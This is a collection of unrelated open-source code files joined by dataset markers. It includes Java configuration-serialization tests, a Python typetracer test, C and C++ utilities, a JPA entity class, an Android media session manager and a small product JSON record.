" \"filename\":\"${project.build.testOutputDirectory}/keystore_client.jks\",\n" +
" \"password\":\"<PASSWORD>\",\n" +
" \"certificate-password\":\"<PASSWORD>\",\n" +
" \"key-alias\":\"hotrod\",\n" +
" \"type\":\"JKS\"\n" +
" },\n" +
" \"truststore\":{\n" +
" \"filename\":\"${project.build.testOutputDirectory}/ca.jks\",\n" +
" \"type\":\"pem\"\n" +
" }\n" +
" }\n" +
" }\n" +
" }\n" +
"}";
RemoteStoreConfiguration store = SerializationUtils.fromJson(json);
assertEquals("ccc", store.remoteCacheName());
assertTrue(store.shared());
assertFalse(store.ignoreModifications());
assertFalse(store.hotRodWrapping());
assertFalse(store.rawValues());
assertEquals(60000, store.socketTimeout());
assertEquals(ProtocolVersion.PROTOCOL_VERSION_28, store.protocol());
List<RemoteServerConfiguration> servers = store.servers();
RemoteServerConfiguration firstServer = servers.iterator().next();
assertEquals(1, servers.size());
assertEquals("127.0.0.2", firstServer.host());
assertEquals(12222, firstServer.port());
TypedProperties asyncExecutorProps = store.asyncExecutorFactory().properties();
assertEquals(1, asyncExecutorProps.size());
assertEquals(4, asyncExecutorProps.getLongProperty("name", 0L));
ConnectionPoolConfiguration poolConfiguration = store.connectionPool();
assertEquals(ExhaustedAction.CREATE_NEW, poolConfiguration.exhaustedAction());
assertEquals(110, poolConfiguration.maxActive());
AuthenticationConfiguration authentication = store.security().authentication();
assertEquals("servername", authentication.serverName());
MechanismConfiguration mechanismConfiguration = authentication.mechanismConfiguration();
assertEquals(mechanismConfiguration.saslMechanism(), "DIGEST-MD5");
SslConfiguration ssl = store.security().ssl();
assertEquals("snihostname", ssl.sniHostName());
assertEquals("secret", new String(ssl.keyStorePassword()));
}
@Test
public void testJsonSerializing() {
ConfigurationBuilder builder = new ConfigurationBuilder();
builder.persistence().addStore(RemoteStoreConfigurationBuilder.class)
.remoteCacheName("remote").addServer().host("127.0.0.2").port(1111)
.remoteSecurity()
.authentication().enable().saslMechanism("DIGEST-MD5")
.username("user")
.password("<PASSWORD>")
.realm("default");
RemoteStoreConfiguration remoteStoreConfiguration = (RemoteStoreConfiguration) builder.build().persistence().stores().iterator().next();
Json serialized = Json.read(SerializationUtils.toJson(remoteStoreConfiguration));
assertEquals(1, serialized.asJsonMap().size());
assertNotNull(serialized.at("remote-store"));
}
}
| 2,967 |
519 | <reponame>scikit-hep/awkward-1.0
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
import pytest # noqa: F401
import numpy as np # noqa: F401
import awkward as ak # noqa: F401
from awkward._v2._typetracer import Interval
typetracer = ak._v2._typetracer.TypeTracer.instance()
def test_getitem_at():
concrete = ak._v2.contents.NumpyArray(np.arange(2 * 3 * 5).reshape(2, 3, 5) * 0.1)
abstract = ak._v2.contents.NumpyArray(concrete.to(typetracer))
assert concrete.shape == (2, 3, 5)
assert abstract.shape == (Interval.exact(2), 3, 5)
assert abstract[0].shape == (Interval.exact(3), 5)
assert abstract[0][0].shape == (Interval.exact(5),)
assert abstract[0][0][0] == 0
assert abstract.form == concrete.form
assert abstract.form.type == concrete.form.type
assert abstract[0].form == concrete[0].form
assert abstract[0].form.type == concrete[0].form.type
| 383 |
956 | /* SPDX-License-Identifier: BSD-3-Clause
* Copyright(c) 2017 Cavium, Inc
*/
#ifndef _RTE_PAUSE_ARM_H_
#define _RTE_PAUSE_ARM_H_
#ifdef __cplusplus
extern "C" {
#endif
#ifdef RTE_ARCH_64
#include <rte_pause_64.h>
#else
#include <rte_pause_32.h>
#endif
#ifdef __cplusplus
}
#endif
#endif /* _RTE_PAUSE_ARM_H_ */
| 154 |
5,156 | from util import *
send_gdb('break breakpoint')
expect_gdb('Breakpoint 1')
send_gdb('c')
expect_gdb('Breakpoint 1')
send_gdb('stepi')
send_gdb('c')
expect_rr('EXIT-SUCCESS')
expect_gdb('exited normally')
ok()
| 93 |
310 | <filename>gear/hardware/a/aws-600-blk.json
{
"name": "AWS-600-BLK",
"description": "Kitchen scales.",
"url": "https://www.amazon.com/American-Weigh-Scales-AWS-600-BLK-Nutrition/dp/B000O37TDO/"
}
| 89 |
309 | #include <random>
#include <algorithm>
// Random utility functions
//
// ---------------------------------------------------------
// Copyright (c) 2016, <NAME>
//
// This file is part of the APC Vision Toolbox and is available
// under the terms of the Simplified BSD License provided in
// LICENSE. Please retain this notice and LICENSE if you use
// this file (or any portion of it) in your project.
// ---------------------------------------------------------
float GetRandomFloat(float min, float max) {
std::random_device rd;
std::mt19937 mt(rd());
std::uniform_real_distribution<double> dist(min, max - 0.0001);
return dist(mt);
}
std::string GetRandomString(size_t str_len) {
auto rand_char = []() -> char {
const char char_set[] = "0123456789abcdefghijklmnopqrstuvwxyz";
return char_set[((int)std::floor(GetRandomFloat(0.0f, (float)sizeof(char_set) - 1)))];
};
std::string rand_str(str_len, 0);
std::generate_n(rand_str.begin(), str_len, rand_char);
return rand_str;
}
| 361 |
1,262 | <reponame>chinmayapadhi/metacat
/*
* Copyright 2016 Netflix, Inc.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.metacat.connector.s3.model;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.FetchType;
import javax.persistence.JoinColumn;
import javax.persistence.OneToOne;
import javax.persistence.UniqueConstraint;
/**
* Location.
*/
@Entity
@javax.persistence.Table(name = "location",
uniqueConstraints = @UniqueConstraint(name = "location_u1", columnNames = "table_id"))
public class Location extends IdEntity {
/*
static belongsTo = [table: Table]
static hasOne = [schema: Schema, info: Info]
//TODO: Serde info
String uri
*/
private String uri;
private Table table;
private Schema schema;
private Info info;
@Column(name = "uri", nullable = true)
public String getUri() {
return uri;
}
public void setUri(final String uri) {
this.uri = uri;
}
@OneToOne
@JoinColumn(name = "table_id", nullable = false)
public Table getTable() {
return table;
}
public void setTable(final Table table) {
this.table = table;
}
@OneToOne(cascade = CascadeType.ALL, fetch = FetchType.EAGER, mappedBy = "location")
public Schema getSchema() {
return schema;
}
public void setSchema(final Schema schema) {
this.schema = schema;
}
@OneToOne(cascade = CascadeType.ALL, fetch = FetchType.EAGER, mappedBy = "location")
public Info getInfo() {
return info;
}
public void setInfo(final Info info) {
this.info = info;
}
}
| 823 |
14,668 | // Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.components.media_router.cast_emulator.remote;
import android.app.PendingIntent;
import android.content.Context;
import android.net.Uri;
import androidx.mediarouter.media.MediaSessionStatus;
/**
* LocalSessionManager emulates the local management of the playback of media items on Chromecast.
* It only handles one item at a time, and does not support queuing.
*
* Most members simply forward their calls to a RemoteSessionManager, which emulates the session
* management on the Chromecast, however this class also controls connection to and disconnection
* from the RemoteSessionManager.
*/
public class LocalSessionManager {
/**
* Callbacks for MediaRouteProvider object.
*/
public interface Callback {
void onItemChanged(MediaItem item);
}
private Callback mCallback;
private RemoteSessionManager mRemoteManager;
private final Context mContext;
/**
* @param context
*/
public LocalSessionManager(Context context) {
mContext = context;
}
/**
* Add a video we want to play
* @param uri the URI of the video
* @param mime the mime type
* @param receiver the pending intent to use to send state changes
* @return the new media item
*/
public MediaItem add(Uri uri, String mime, PendingIntent receiver, long contentPosition) {
if (!hasSession()) mRemoteManager = RemoteSessionManager.connect(this, mContext);
return mRemoteManager.add(uri, mime, receiver, contentPosition);
}
/**
* End the current session
* @return whether there was a current session
*/
public boolean endSession() {
if (hasSession()) {
mRemoteManager.disconnect();
mRemoteManager = null;
return true;
}
return false;
}
/**
* Get the currently playing item
* @return the currently playing item, or null if none.
*/
public MediaItem getCurrentItem() {
return hasSession() ? mRemoteManager.getCurrentItem() : null;
}
/**
* Get the session id of the current session
* @return the session id, or null if none.
*/
public String getSessionId() {
return hasSession() ? mRemoteManager.getSessionId() : null;
}
/**
* Get the status of a session
* @param sid the session id of session being asked about
* @return the status
*/
public MediaSessionStatus getSessionStatus(String sid) {
if (!hasSession()) {
return new MediaSessionStatus.Builder(MediaSessionStatus.SESSION_STATE_INVALIDATED)
.setQueuePaused(false)
.build();
}
return mRemoteManager.getSessionStatus(sid);
}
/**
* Get a printable string describing the status of the session
* @return the string
*/
public String getSessionStatusString() {
if (hasSession()) {
return mRemoteManager.getSessionStatusString();
} else {
return "No remote session connection";
}
}
/**
* Get the status of a media item
* @param iid - the id of the item
* @return the MediaItem, from which its status can be read.
*/
public MediaItem getStatus(String iid) {
if (!hasSession()) {
throw new IllegalStateException("Session not set!");
}
return mRemoteManager.getStatus(iid);
}
/**
* @return whether there is a current session
*/
public boolean hasSession() {
return mRemoteManager != null;
}
/**
* @return whether the current video is paused
*/
public boolean isPaused() {
return hasSession() && mRemoteManager.isPaused();
}
/**
* Forward the item changed callback to the UI
* @param item the item that has changed.
*/
public void onItemChanged(MediaItem item) {
if (mCallback != null) mCallback.onItemChanged(item);
}
/**
* Pause the current video
*/
public void pause() {
if (hasSession()) mRemoteManager.pause();
}
/**
* Resume the current video
*/
public void resume() {
if (hasSession()) mRemoteManager.resume();
}
/**
* Seek to a position in a video
* @param iid the id of the video
* @param pos the position in ms
* @return the Media item.
*/
public MediaItem seek(String iid, long pos) {
return hasSession() ? mRemoteManager.seek(iid, pos) : null;
}
/**
* provide a callback interface to tell the UI when significant state changes occur
* @param callback the callback object
*/
public void setCallback(Callback callback) {
mCallback = callback;
}
/**
* Start a new local session
* @param relaunch relaunch the remote session (the emulation of the Chromecast app) even if it
* is already running.
* @return The new session id
*/
public String startSession(boolean relaunch) {
if (!relaunch) endSession();
if (!hasSession()) mRemoteManager = RemoteSessionManager.connect(this, mContext);
return mRemoteManager.startSession(relaunch);
}
/**
* Stop the current video
*/
public void stop() {
if (hasSession()) mRemoteManager.stop();
endSession();
}
/**
* Updates the session status.
*/
public void updateStatus() {
if (hasSession()) mRemoteManager.updateStatus();
}
}
| 2,071 |
389 | <gh_stars>100-1000
/*
* Copyright 2014 <NAME>, Inc.
*/
package gw.internal.gosu.compiler;
import gw.internal.gosu.ir.transform.GosuClassTransformer;
import gw.internal.gosu.ir.transform.util.IRTypeResolver;
import gw.lang.reflect.Modifier;
import gw.lang.reflect.TypeSystem;
import gw.lang.reflect.gs.IGosuEnhancement;
import java.lang.reflect.Field;
/**
*/
public class EnhancedTypeFieldTest extends ByteCodeTestBase
{
public void testThis() throws Exception
{
Class cls = newTestClass();
// The compiler adds the ENHANCED$TYPE field for tooling
Field f = cls.getDeclaredField( GosuClassTransformer.ENHANCED_TYPE_FIELD );
assertTrue( Modifier.isPrivate( f.getModifiers() ) );
IGosuEnhancement type = (IGosuEnhancement)TypeSystem.get( cls );
assertEquals( IRTypeResolver.getDescriptor( type.getEnhancedType() ).getName(), f.getType().getName() );
}
private Class newTestClass() throws ClassNotFoundException, InstantiationException, IllegalAccessException
{
final String classPropertyIdentifier = "gw.internal.gosu.compiler.sample.statement.classes.EnhancedTypeFieldTest_Enh";
Class<?> javaClass = GosuClassLoader.instance().findClass( classPropertyIdentifier );
assertNotNull( javaClass );
assertEquals( classPropertyIdentifier, javaClass.getName() );
return javaClass;
}
} | 445 |
603 | #ifdef _MSC_VER
#include <nmmintrin.h>
#else
#include <popcntintrin.h>
#endif
int main(void)
{
long long a = 0;
int b;
#ifdef _MSC_VER
#ifdef _M_X64
a = _mm_popcnt_u64(1);
#endif
b = _mm_popcnt_u32(1);
#else
#ifdef __x86_64__
a = __builtin_popcountll(1);
#endif
b = __builtin_popcount(1);
#endif
return (int)a + b;
}
| 203 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.